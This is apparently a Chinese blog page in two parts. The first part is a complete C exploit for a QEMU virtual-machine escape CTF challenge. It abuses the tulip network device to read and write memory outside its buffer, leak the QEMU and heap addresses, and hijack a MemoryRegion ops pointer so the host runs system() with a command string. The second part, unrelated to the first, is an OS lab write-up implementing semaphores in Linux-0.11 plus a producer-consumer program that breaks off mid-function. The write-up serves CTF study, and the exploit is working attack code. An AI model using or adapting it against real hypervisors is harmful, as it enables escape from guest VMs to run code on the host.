261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/io.h>
#include <unistd.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT) // 4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)

#define PMIO_BASE 0x000000000000c000
#define CSR(_x) ((_x) << 3)
#define CSR5_TS_SUSPENDED 6

#if 0

tulip_write ->
tulip_xmit_list_update ->
tulip_copy_tx_buffers ->
pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1); ->

static uint32_t tulip_ts(TULIPState *s)
{
return (s->csr[5] >> CSR5_TS_SHIFT) & CSR5_TS_MASK;
}

#endif

/* Guest-side copy of the device's 16-byte DMA descriptor layout. */
struct tulip_descriptor {
uint32_t status;    /* status word (ownership and status bits) */
uint32_t control;   /* control flags plus the two buffer-size bit-fields */
uint32_t buf_addr1; /* guest physical address of the first data buffer */
uint32_t buf_addr2; /* guest physical address of the second data buffer */
};

int fd;

/* Return the offset of addr inside its page (the low PAGE_SHIFT bits). */
uint32_t page_offset(uint32_t addr) {
    uint32_t low_bits = (1 << PAGE_SHIFT) - 1;

    return addr & low_bits;
}

/*
 * Translate a guest virtual address into its guest frame number by
 * reading the matching 8-byte entry of /proc/self/pagemap through the
 * global descriptor `fd`.
 *
 * Returns the frame number, or (uint64_t)-1 when the entry cannot be
 * read or the page is not present. Failed seeks and short reads are now
 * reported instead of parsing an uninitialised entry.
 */
uint64_t gva_to_gfn(void *addr) {
    uint64_t pme;
    size_t offset;

    /* (addr >> PAGE_SHIFT) * 8: one 64-bit entry per 4 KiB page */
    offset = ((uintptr_t)addr >> 9) & ~7;
    if (lseek(fd, offset, SEEK_SET) < 0)
        return -1;
    if (read(fd, &pme, sizeof pme) != (int)sizeof pme)
        return -1;
    if (!(pme & PFN_PRESENT))
        return -1;
    return pme & PFN_PFN;
}

/*
 * Translate a guest virtual address into a guest physical address:
 * frame number from gva_to_gfn shifted by PAGE_SHIFT, combined with the
 * in-page offset. Aborts via assert when the page has no frame.
 */
uint64_t gva_to_gpa(void *addr) {
    uint64_t frame = gva_to_gfn(addr);
    uint64_t in_page;

    assert(frame != -1);
    in_page = page_offset((uint64_t)addr);
    return (frame << PAGE_SHIFT) | in_page;
}

/* Read a 16-bit value (inw) from the device I/O port PMIO_BASE + port. */
uint64_t pmio_read(uint64_t port) {
    return inw(PMIO_BASE + port);
}

/* Write the low 16 bits of val (outw) to the device I/O port PMIO_BASE + port. */
void pmio_write(uint64_t port, uint64_t val) {
    uint64_t io_port = PMIO_BASE + port;

    outw(val, io_port);
}

/* Write the low 32 bits of val (outl) to the device I/O port PMIO_BASE + port. */
void pmio_writel(uint64_t port, uint64_t val) {
    uint64_t io_port = PMIO_BASE + port;

    outl(val, io_port);
}

/*
 * Exploit driver, in three stages:
 *   stage1 - push tx_frame_len to 0x800 with two 0x400-byte descriptors,
 *            overwrite the fields that follow tx_frame with forged values
 *            and loop the frame back so that memory past rx_frame is
 *            copied into recv_buf; derive qemu_base / heap_base from it.
 *   stage2 - forge a negative tx_frame_len and write the command string
 *            in front of tx_frame.
 *   stage3 - place a fake ops table in tx_frame, overwrite a
 *            MemoryRegion.ops pointer with its address and trigger it.
 *
 * All numeric offsets (0x755f9f, 0xe11380, 2859620, 0xe0fcf0, -0x3350,
 * -0x2a28) are specific to the QEMU build of this challenge.
 * NOTE(review): descriptor bits written as raw shifts are presumably
 * OWN (status bit 31), TDES1_LS (control bit 30), TDES1_FS (control bit
 * 29) and the chain bit (bit 24) - confirm against QEMU's tulip.h.
 */
int main(int argc, char **argv) {
printf("[*] enter stage1\n");
int ret = 0;
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}
// raise the I/O privilege level so that in/out instructions are allowed
iopl(3);

// allocate descriptor
struct tulip_descriptor *tx_desc = malloc(sizeof(struct tulip_descriptor));
struct tulip_descriptor *rx_desc = malloc(sizeof(struct tulip_descriptor));

char *recv_buf = malloc(0x9000);
char *buf = malloc(0x1000);
// writing to the buffers also makes sure their pages are present for pagemap
memset(buf, 'A', 0x1000);
memset(recv_buf, 'B', 0x9000);

int len1 = 0x400 << 0;
int len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24); // TDES1_FS, clean tx_frame_len
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

// get the physical address of the descriptor
uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// set CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len should be 0x400 now

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len should be 0x800 now

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1u << 1)); // CSR6_OM_SHIFT trigger tulip_receive

sleep(1);
printf("[*] OOB write tx_frame_len...\n");

int rx_len1, rx_len2;
rx_len1 = 0x400;
rx_len2 = 0;
rx_desc->status = (1UL << 31) | (1UL << 24); // RDES0_OWN
rx_desc->buf_addr1 = gva_to_gpa(recv_buf);
rx_desc->buf_addr2 = 0x180;
rx_desc->control = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);

// set rx descriptor
sleep(1);
uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
pmio_writel(CSR(3), rx_desc_gpa);

struct oob_data { // control the following fields in TULIPState
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
};
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
// the device adds len1 to tx_frame_len after the copy, so it ends up as 0x800
oob_data->tx_frame_len = 0x800 - len1;
// forged so that the copy-out source rx_frame + (rx_frame_size - rx_frame_len) lies past rx_frame
oob_data->rx_frame_len = 0x900;
oob_data->rx_frame_size = 2048*2 + 0x900;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 'A';
oob_data->filter[i][1] = 'A';
oob_data->filter[i][2] = 'A';
oob_data->filter[i][3] = 'A';
oob_data->filter[i][4] = 'A';
oob_data->filter[i][5] = 'A';
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24) | (1UL << 30);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

// dump the first 800 bytes of the leaked data
printf("[+] leak\n");
char *cur = (char *)recv_buf;
for (int i = 0; i < 50; ++i) {
printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur+8));
cur += 16;
}
cur = (char *)recv_buf;
// build-specific: leaked qwords 0x1d and 22 hold a QEMU image pointer and a heap pointer
uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
uint64_t qemu_plt_system = qemu_base+2859620;
// presumably the address of TULIPState.tx_frame - verify for the target build
uint64_t frame_base = heap_base+0xe0fcf0;
printf("[*] continue...\n");
printf("[+] qemu_base: 0x%lx\n", qemu_base);
printf("[+] heap_base: 0x%lx\n", heap_base);

printf("[*] enter stage2\n"); {
// refill tx_frame up to 0x800 exactly as in stage1
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
// sizeof(struct oob_data) is 0x70; after the device adds len1 back, tx_frame_len becomes -0x3350
oob_data->tx_frame_len = -0x3350 - 0x70;
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

sleep(1);
// 16 bytes written at tx_frame - 0x3350; presumably where the hijacked callback's first argument points - verify
uint64_t *binsh = (uint64_t *)malloc(0x200);
binsh[0] = 7449354444534473059; // catflag
binsh[1] = 0;
len1 = 16;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(binsh);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);
}

// now control MemoryRegion.ops
printf("[*] enter stage3\n"); {
// fake ops table at the start of buf: qwords 0 and 1 are presumably the read/write callbacks - verify against MemoryRegionOps
((uint64_t *)buf)[0] = qemu_plt_system;
((uint64_t *)buf)[1] = qemu_plt_system;

((uint64_t *)buf)[2] = 0;
((uint64_t *)buf)[3] = 0;

((uint64_t *)buf)[4] = 2;
((uint64_t *)buf)[5] = 0;

((uint64_t *)buf)[6] = 0;
((uint64_t *)buf)[7] = 0;

((uint64_t *)buf)[8] = 0x0000000400000004;
((uint64_t *)buf)[9] = 0;

((uint64_t *)buf)[10] = 0;
((uint64_t *)buf)[11] = 0;
// copy buf (with the fake table) into tx_frame, again up to 0x800
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x2a28-0x70; // now points to the MemoryRegion.ops
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

sleep(1);
printf("[*] hijack ops\n");
// 8-byte write: replace the ops pointer with the address of the fake table
uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
fake_memory_region_ops[0] = frame_base;
len1 = 8;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);

// trigger the ops.write
pmio_writel(CSR(4), tx_desc_gpa);
}

return 0;
}

小结:

刚刚入门 qemu 逃逸,理解并调试了下别人的 exp(本题目没有移除调试符号,调试起来还是很轻松的)

HIT-OSLab5

实验目的:

  • 加深对进程同步与互斥概念的认识
  • 掌握信号量的实现原理(两种不同的实现方式)
  • 掌握信号量的使用,并应用它解决生产者-消费者问题

实验内容:

  • 在 Linux-0.11 中实现信号量,具体来说就是实现如下4个系统调用:
    • sys_sem_open:用于打开一个信号量文件描述符
    • sys_sem_wait:等待一个信号量的释放
    • sys_sem_post:释放一个信号量
    • sys_sem_unlink:删除一个信号量
  • 在 Ubuntu 下编写程序,用已经实现的信号量解决生产者-消费者问题

实验过程

进程同步与互斥是操作系统中实现进程间通信和同步的基本机制,它们的主要目的是确保在多个进程之间共享资源时,能够正确地保持同步状态,避免竞争条件和数据不一致等问题

  • 进程同步是指多个进程按照一定的先后次序协调推进(例如消费者必须等生产者放入产品之后才能取走),强调的是进程之间的执行顺序
  • 进程互斥是指在多个进程之间同步对共享资源的互斥访问,确保同一时刻只有一个进程可以访问共享资源

进程同步和互斥可以通过不同的同步原语来实现,例如:锁(Lock)、信号量(Semaphore)、条件变量(ConditionVariable)

  • 锁:有两种实现方式,基于原子操作和基于信号量
  • 信号量:核心结构为一个整数和一个等待队列
  • 条件变量:在满足特定条件时通知进程,使其可以访问共享资源

PV 操作是指进程之间的同步原语,用于实现进程之间的同步和通信(PV 操作是 Posix 信号量的一种实现方式)

  • P操作:信号量 --,判断是不是要阻塞
  • V操作:信号量 ++,判断是不是要唤醒

PV 操作的实现需要保证操作的原子性,而保证原子性有很多方法:

  • 这里不采用软件保护法(比如:轮换法 \ 标记法 \ peterson 算法 \ Lamport 面包店算法),而是采用硬件保护法
  • 由于是 linux-0.11 运行在单核 cpu 上(Bochs 虚拟机提供单核 cpu 环境),所以可以采用简单的开关中断的方法
  • 如果是多 cpu 环境,就使用硬件原子指令保护法(用硬件原子指令操控一个 mutex 信号量来保护临界区)

开关中断的实现需要依赖如下函数:

1
2
#define sti() __asm__ ("sti"::) // 开中断
#define cli() __asm__ ("cli"::) // 关中断

基于 PV 操作实现信号量的模板如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
P(){ 
cli();
value--; // 信号量--
if(value < 0){
schedual(); // 调度其他进程
}
sti();
}

V(){
cli();
value++; // 信号量++
if(value <= 0){
wakeup(); // 唤醒等待队列中的进程
}
sti();
}
  • 信号量 > 0 时,信号量代表临界区中拥有的资源数目
  • 信号量 < 0 时,信号量代表等待队列中的进程数目

本实验要求我们实现信号量,定义信号量的数据结构如下:(在 /include/unistd.h 中)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#define QUE_LEN 16

/*
 * Fixed-size circular FIFO of tasks blocked on a semaphore.
 * The queue is empty when front == rear and full when
 * (rear + 1) % QUE_LEN == front, so it holds at most QUE_LEN - 1 tasks.
 */
struct semaphore_queue{
int front; /* index of the next task to dequeue */
int rear; /* index of the next free slot */
struct task_struct *wait_tasks[QUE_LEN];
};
typedef struct semaphore_queue sem_queue;

/*
 * A named counting semaphore. A slot whose name starts with '\0' is
 * treated as free by sys_sem_open.
 */
struct semaphore_t{
int value; /* semaphore counter */
char name[20]; /* semaphore name */
struct semaphore_queue wait_queue; /* tasks waiting on this semaphore */
};
typedef struct semaphore_t sem_t;
  • wait_tasks[QUE_LEN] 为静态列表,索引 front / rear 分别表示其头部 / 尾部的位置

首先我们需要添加信号量的系统调用号:(在 /include/unistd.h 中)

1
2
3
4
#define __NR_sem_open 	72
#define __NR_sem_wait 73
#define __NR_sem_post 74
#define __NR_sem_unlink 75
  • 需要注意的是:这里同时需要修改 hdc-0.11.img 中的 hdc/usr/include/unistd.h 文件,如果想在虚拟机中使用 gcc 编译的话,会导入虚拟机 hdc/usr/include/ 中的文件为头文件

接着修改系统调用号的总数:(在 /kernel/system_call.s 中)

1
nr_system_calls = 76

最后添加新的系统调用定义:(在 /include/linux/sys.h 中)

1
2
3
4
5
6
extern int sys_sem_open();
extern int sys_sem_wait();
extern int sys_sem_post();
extern int sys_sem_unlink();

fn_ptr sys_call_table[] = {......,sys_sem_open,sys_sem_wait,sys_sem_post,sys_sem_unlink};

头文件以及全局变量:(在 /kernel 中新建文件 sem.c

1
2
3
4
5
6
7
8
9
#define __LIBRARY__  
#include <unistd.h>
#include <linux/sched.h>
#include <linux/kernel.h>
#include <asm/segment.h>
#include <asm/system.h>

#define SEM_COUNT 32
sem_t semaphores[SEM_COUNT];

基础字符串函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
 * Compare two semaphore names over at most 20 bytes.
 * Returns 1 when they are equal (up to and including the terminator, or
 * over all 20 bytes when neither is terminated), 0 otherwise.
 * Note the result is the inverse of the standard strcmp convention.
 */
int strcmp_sem(char* name,char* tmp){
    int pos = 0;

    while (pos < 20) {
        char ch = name[pos];

        if (ch != tmp[pos])
            return 0;
        if (ch == '\0')
            return 1;
        pos++;
    }
    return 1;
}

/*
 * Copy a semaphore name from tmp into name, at most 20 bytes, stopping
 * after the terminator has been copied.
 * Returns the index of the terminator, or 20 when none was found within
 * the first 20 bytes.
 */
int strcpy_sem(char* name,char* tmp){
    int copied = 0;

    while (copied < 20) {
        char ch = tmp[copied];

        name[copied] = ch;
        if (ch == '\0')
            return copied;
        copied++;
    }
    return copied;
}

插入 / 获取 task_struct 结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/*
 * Dequeue the oldest waiting task of semaphore q.
 * Returns NULL (after logging) when the wait queue is empty.
 */
struct task_struct * get_task(sem_t* q)
{
    int head = q->wait_queue.front;
    struct task_struct *next;

    if (head == q->wait_queue.rear) {
        printk("Queue is empty!\n");
        return NULL;
    }
    next = q->wait_queue.wait_tasks[head];
    q->wait_queue.front = (head + 1) % QUE_LEN;
    return next;
}

/*
 * Append task p to the wait queue of semaphore q.
 * Returns 1 on success, or -1 (after logging) when the queue is full.
 */
int insert_task(struct task_struct *p,sem_t* q)
{
    int tail = q->wait_queue.rear;
    int next_tail = (tail + 1) % QUE_LEN;

    if (next_tail == q->wait_queue.front) {
        printk("Queue is full!\n");
        return -1;
    }
    q->wait_queue.wait_tasks[tail] = p;
    q->wait_queue.rear = next_tail;
    return 1;
}
  • 使用静态队列 FIFO

系统调用 sys_sem_open:打开一个信号量文件描述符

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
/*
 * System call: open the semaphore called `name`, creating it with the
 * initial count `value` when it does not exist yet.
 *
 * name  - user-space pointer to a NUL-terminated name of 1..19 bytes
 * value - initial counter, only used when the semaphore is created
 *
 * Returns the semaphore's index in semaphores[], or -1 when the name is
 * empty or too long, or when no free slot is left.
 */
int sys_sem_open(const char* name,unsigned int value)
{
    char tmp[20];
    char c;
    int i;

    /* copy the name out of user space, one byte at a time */
    for (i = 0; i < 20; i++) {
        c = get_fs_byte(name+i);
        tmp[i] = c;
        if (c == '\0') break;
    }
    /* no terminator within 20 bytes: test the index, not the last byte read */
    if (i >= 20) {
        printk("Semaphore name is too long!");
        return -1;
    }
    /* an empty name would be indistinguishable from a free slot */
    if (i == 0) {
        printk("Semaphore name is empty!\n");
        return -1;
    }

    /* already exists: hand back the existing slot */
    for (i = 0; i < SEM_COUNT; i++) {
        if (strcmp_sem(semaphores[i].name, tmp)) {
            printk("sem %s is exist\n", semaphores[i].name);
            return i;
        }
    }
    /* otherwise claim the first free slot */
    for (i = 0; i < SEM_COUNT; i++) {
        if (semaphores[i].name[0] == '\0') {
            strcpy_sem(semaphores[i].name, tmp);
            semaphores[i].value = value;
            semaphores[i].wait_queue.front = 0;
            semaphores[i].wait_queue.rear = 0;
            printk("create sem %s done\n", tmp);
            return i;
        }
    }
    printk("Numbers of semaphores are limited!\n");
    return -1;
}

系统调用 sys_sem_wait:P 操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/*
 * System call: P operation on semaphore index i.
 * Decrements the counter and blocks the calling task while it is negative.
 *
 * Returns 0 on success, -1 when i is not a valid index (valid indices are
 * 0..SEM_COUNT-1) or when the wait queue is full.
 */
int sys_sem_wait(int i){
    sem_t* sem;

    /* semaphores[] has SEM_COUNT entries, so SEM_COUNT itself is out of range */
    if (i < 0 || i >= SEM_COUNT) {
        printk("sem (P) error\n");
        return -1;
    }

    cli();
    sem = &semaphores[i];
    sem->value--;
    if (sem->value < 0) {
        /* never sleep without being queued: nobody could wake us up again */
        if (insert_task(current, sem) < 0) {
            sem->value++;
            sti();
            return -1;
        }
        current->state = TASK_UNINTERRUPTIBLE;
        schedule();
    }
    sti();
    return 0;
}

系统调用 sys_sem_post:V 操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/*
 * System call: V operation on semaphore index i.
 * Increments the counter and, when tasks are still waiting (counter <= 0
 * after the increment), makes the oldest waiter runnable.
 *
 * Returns 0 on success, -1 when i is not a valid index (valid indices are
 * 0..SEM_COUNT-1).
 */
int sys_sem_post(int i)
{
    sem_t* sem;
    struct task_struct *p;

    /* semaphores[] has SEM_COUNT entries, so SEM_COUNT itself is out of range */
    if (i < 0 || i >= SEM_COUNT) {
        printk("sem (V) error\n");
        return -1;
    }

    cli();
    sem = &semaphores[i];
    sem->value++;
    if (sem->value <= 0) {
        p = get_task(sem);
        if (p != NULL) {
            p->state = TASK_RUNNING;
        }
    }
    sti();
    return 0;
}

系统调用 sys_sem_unlink:删除一个信号量文件描述符

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/*
 * System call: remove the semaphore called `name`.
 * The slot is marked free (empty name) and its counter and wait queue
 * are reset; tasks still recorded in the queue are not woken up.
 *
 * name - user-space pointer to a NUL-terminated name of 1..19 bytes
 *
 * Returns 0 when the semaphore was removed, -1 when the name is empty or
 * too long, or when no such semaphore exists.
 */
int sys_sem_unlink(const char *name)
{
    char tmp[20];
    char c;
    int i,j;

    /* copy the name out of user space, one byte at a time */
    for (i = 0; i < 20; i++) {
        c = get_fs_byte(name+i);
        tmp[i] = c;
        if (c == '\0') break;
    }
    /* no terminator within 20 bytes: test the index, not the last byte read */
    if (i >= 20) {
        printk("Semphore name is too long!");
        return -1;
    }
    /* an empty name would match a free slot instead of a real semaphore */
    if (i == 0) {
        return -1;
    }

    for (i = 0; i < SEM_COUNT; i++) {
        if (strcmp(semaphores[i].name, tmp) == 0) {
            printk("sem %s is unlinked\n", semaphores[i].name);
            semaphores[i].name[0] = '\0';
            semaphores[i].value = 0;
            semaphores[i].wait_queue.front = 0;
            semaphores[i].wait_queue.rear = 0;
            for (j = 0; j < QUE_LEN; j++) {
                semaphores[i].wait_queue.wait_tasks[j] = NULL;
            }
            return 0;
        }
    }
    return -1;
}

修改 makefile:

1
2
3
4
5
# Object list for this directory; sem.o (built from sem.c) is appended at the end.
OBJS  = sched.o system_call.o traps.o asm.o fork.o \
panic.o printk.o vsprintf.o sys.o exit.o \
signal.o mktime.o sem.o

# sem.s and sem.o depend on sem.c and the two headers listed here.
sem.s sem.o: sem.c ../include/linux/kernel.h ../include/unistd.h

实验的最后我们需要使用信号量来解决生产者-消费者问题

生产者-消费者模型是一个经典的进程同步问题:系统中有一组生产者进程和一组消费者进程,生产者进程每次生产一个产品放入缓冲区,消费者进程每次从缓冲区中取出一个产品并使用,生产者、消费者共享一个初始为空、大小为 n 的缓冲区

  • 只有缓冲区没满时,生产者才能把产品放入缓冲区,否则必须等待
  • 只有缓冲区不为空时,消费者才能从中取出产品,否则必须等待
  • 缓冲区是临界资源,各进程必须互斥地访问

生产者-消费者模型代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#define   __LIBRARY__
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>

/*
 * User-space entry points for the four semaphore system calls, declared
 * through the _syscallN macros (presumably provided by <unistd.h> when
 * __LIBRARY__ is defined - confirm against the header).
 */
_syscall2(int,sem_open,const char *,name,unsigned int,value);
_syscall1(int,sem_wait,int,sem);
_syscall1(int,sem_post,int,sem);
_syscall1(int,sem_unlink,const char *,name);

/* Number of consumer processes forked by main(). */
const int consumerNum = 3;
/* Total number of items written by the producer; consumers split them evenly. */
const int itemNum = 6;
/* Number of int-sized slots in the buffer file; buf_in/buf_out wrap at this value. */
const int bufSize = 10;
/* Next slot to write (producer) and next slot to read (consumers). */
int buf_in = 0,buf_out = 0;

/*
 * Producer-consumer demo built on the sem_open/sem_wait/sem_post/sem_unlink
 * system calls.
 *
 * One producer child (A) writes itemNum integers into "buffer.dat";
 * consumerNum consumer children (B) each handle itemNum/consumerNum items.
 * Three semaphores coordinate them:
 *   "empty" - number of free slots, starts at bufSize;
 *   "full"  - number of filled slots, starts at 0;
 *   "mutex" - binary lock around every access to the file, starts at 1.
 *
 * The consumers keep their shared read index in the file itself, in the
 * int-sized slot located right after the bufSize data slots.
 *
 * Returns 0 on success, -1 if a semaphore, the file, or a fork fails.
 */
int main()
{
    int sem_empty, sem_full, sem_mutex;
    int stat;
    pid_t p;
    int i,j,k,fd;

    /* Free-slot counter: the whole buffer is free at start. */
    if((sem_empty = sem_open("empty",bufSize)) < 0){
        perror("empty error!\n");
        return -1;
    }

    /* Filled-slot counter: nothing has been produced yet. */
    if((sem_full = sem_open("full",0)) < 0){
        perror("full error!\n");
        return -1;
    }

    /* Must be 1 so that only one process at a time is inside the critical section. */
    if((sem_mutex = sem_open("mutex",1)) < 0){
        perror("mutex error!\n");
        return -1;
    }

    fd = open("buffer.dat", O_CREAT | O_RDWR | O_TRUNC, 0666);
    if(fd < 0){
        perror("open error!\n");
        return -1;
    }

    /* Producer child. */
    if(!(p = fork())){
        printf("A(%d) create\n",0);
        for(i = 0; i < itemNum; i++){
            sem_wait(sem_empty);
            sem_wait(sem_mutex);

            /* Store the value buf_in in slot buf_in, then advance the write index. */
            printf("A(%d) >> buf_in:%d\n",0,buf_in);
            lseek(fd, buf_in * sizeof(int), SEEK_SET);
            write(fd, (char *)&buf_in, sizeof(int));
            buf_in = (buf_in+1) % bufSize;

            sem_post(sem_mutex);
            sem_post(sem_full);
        }
        printf("A(%d) done\n",0);
        return 0;
    }
    else if(p < 0){
        perror("fork error!\n");
        return -1;
    }

    /* Consumer children. */
    for(j = 0; j < consumerNum; j++){
        if(!(p = fork())){
            printf("B(%d) create\n",j);
            for(k = 0; k < itemNum/consumerNum; k++){
                sem_wait(sem_full);
                sem_wait(sem_mutex);

                /*
                 * Fetch the shared read index from the slot after the data
                 * area. If nothing has been stored there yet the read
                 * transfers no bytes and buf_out keeps its initial 0.
                 */
                lseek(fd, bufSize * sizeof(int), SEEK_SET);
                read(fd, (char *)&buf_out, sizeof(int));
                printf("B(%d) >> buf_out:%d\n",j,buf_out);

                /* Advance the index and write it back for the next consumer. */
                buf_out = (buf_out + 1) % bufSize;
                lseek(fd, bufSize * sizeof(int), SEEK_SET);
                write(fd, (char *)&buf_out, sizeof(int));

                sem_post(sem_mutex);
                sem_post(sem_empty);

            }
            printf("B(%d) done\n",j);
            return 0;
        }
        else if(p < 0){
            perror("fork error!\n");
            return -1;
        }
    }

    /* Parent: reap every child, then remove the semaphores. */
